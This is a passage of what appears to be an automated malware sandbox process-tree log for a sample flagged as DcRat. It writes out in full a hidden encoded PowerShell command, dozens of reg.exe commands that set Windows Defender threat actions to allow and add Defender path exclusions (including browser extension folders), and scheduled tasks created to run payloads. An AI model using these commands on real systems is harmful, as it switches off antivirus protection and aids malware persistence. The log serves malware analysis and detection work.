  PID:4584
- - C:\Users\Admin\AppData\Local\Temp\3582-490\SUPPOR~1.EXE
    C:\Users\Admin\AppData\Local\Temp\3582-490\SUPPOR~1.EXE
    3⤵
    PID:5072
  - - C:\Users\Admin\AppData\Local\Temp\3582-490\SUPPOR~1.EXE
      C:\Users\Admin\AppData\Local\Temp\3582-490\SUPPOR~1.EXE
      4⤵
      PID:6840

C:\ProgramData\rdytutcdlfrg\uxtldsktkgfv.exe
C:\ProgramData\rdytutcdlfrg\uxtldsktkgfv.exe
1⤵
PID:5628
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:5008
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:5344

C:\Users\Admin\AppData\Roaming\Windata\system.exe
C:\Users\Admin\AppData\Roaming\Windata\system.exe
1⤵
PID:4980

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1520 -ip 1520
1⤵
PID:244

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2500 -ip 2500
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:976

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
1⤵
PID:3776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4448 -ip 4448
1⤵
PID:5916

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004D8 0x00000000000004B4
1⤵
PID:1036

C:\Users\Admin\AppData\Roaming\Message\SupportsDynamicPartitions.exe
C:\Users\Admin\AppData\Roaming\Message\SupportsDynamicPartitions.exe
1⤵
PID:1344
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\SUPPOR~1.EXE"
  2⤵
  PID:1624
- - C:\Users\Admin\AppData\Local\Temp\3582-490\SUPPOR~1.EXE
    C:\Users\Admin\AppData\Local\Temp\3582-490\SUPPOR~1.EXE
    3⤵
    PID:6988

C:\ProgramData\Dllhost\dllhost.exe
C:\ProgramData\Dllhost\dllhost.exe
1⤵
PID:5104
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\dllhost.exe"
  2⤵
  PID:4432

C:\Users\Admin\AppData\Roaming\Windata\system.exe
C:\Users\Admin\AppData\Roaming\Windata\system.exe
1⤵
PID:420

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
- Drops file in Windows directory
PID:4884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1604 -ip 1604
1⤵
PID:1204

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
1⤵
PID:7076
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\.exe"
  2⤵
  PID:6796

C:\Users\Admin\AppData\Roaming\udccidg
C:\Users\Admin\AppData\Roaming\udccidg
1⤵
PID:2100

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:5272
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 6EE7E1329214105D1C0A5424555D4D3C C
  2⤵
  PID:6744
- C:\Windows\system32\srtasks.exe
  C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
  2⤵
  PID:1508
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 0025F7BE9265206C1C154A1C5B9727A6
  2⤵
  PID:3240
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssF7F6.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msiF7E2.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scrF7E3.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scrF7E4.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
    3⤵
    PID:4880

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:6452

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:6444

C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX\JUGvIKEgUujoQLJ\PqkpRPi.exe
C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX\JUGvIKEgUujoQLJ\PqkpRPi.exe Ik /Kosite_idXNO 385118 /S
1⤵
PID:6908
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:1008
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7152
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:6068
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2772
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2256
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7112
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1544
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1500
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2876
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1156
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4908
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7008
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6532
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1428
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6328
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3812
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3980
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6764
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1344
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6960
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7016
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6516
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3392
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5696
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6544
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6720
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6768
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4040
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1524
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6332
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MiKcmJhqU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MiKcmJhqU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NFyWcaFNQqjkebtjyfR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NFyWcaFNQqjkebtjyfR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PEKrPVrLutUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PEKrPVrLutUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WQqkELkVHOYU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WQqkELkVHOYU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mQvpiNUsNPjLC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mQvpiNUsNPjLC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\UrkGLyjigLRybTVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\UrkGLyjigLRybTVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\YYFeagcQEOcPvCau\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\YYFeagcQEOcPvCau\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  PID:5204
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MiKcmJhqU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6840
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MiKcmJhqU" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:6600
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MiKcmJhqU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6724
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NFyWcaFNQqjkebtjyfR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2008
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NFyWcaFNQqjkebtjyfR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5504
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PEKrPVrLutUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1444
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PEKrPVrLutUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5636
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WQqkELkVHOYU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5788
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WQqkELkVHOYU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6244
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mQvpiNUsNPjLC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6932
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mQvpiNUsNPjLC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6820
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\UrkGLyjigLRybTVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:7512
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\UrkGLyjigLRybTVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:8032
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4760
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4080
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4920
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:7312
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6872
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:7620
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\YYFeagcQEOcPvCau /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3036
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\YYFeagcQEOcPvCau /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6332
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gkNTzbJXq" /SC once /ST 14:55:05 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - DcRat
  - Creates scheduled task(s)
  PID:6920
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gkNTzbJXq"
  2⤵
  PID:5328
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gkNTzbJXq"
  2⤵
  PID:6808
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "OvvioKEypuBLsTFYZ" /SC once /ST 12:21:09 /RU "SYSTEM" /TR "\"C:\Windows\Temp\YYFeagcQEOcPvCau\tKpADNrKyKjYycp\tAaOMuM.exe\" dM /dCsite_idbno 385118 /S" /V1 /F
  2⤵
  - DcRat
  - Creates scheduled task(s)
  PID:7916
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "OvvioKEypuBLsTFYZ"
  2⤵
  PID:7816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 840 -ip 840
1⤵
PID:1632

C:\Windows\SysWOW64\WerFault.exe
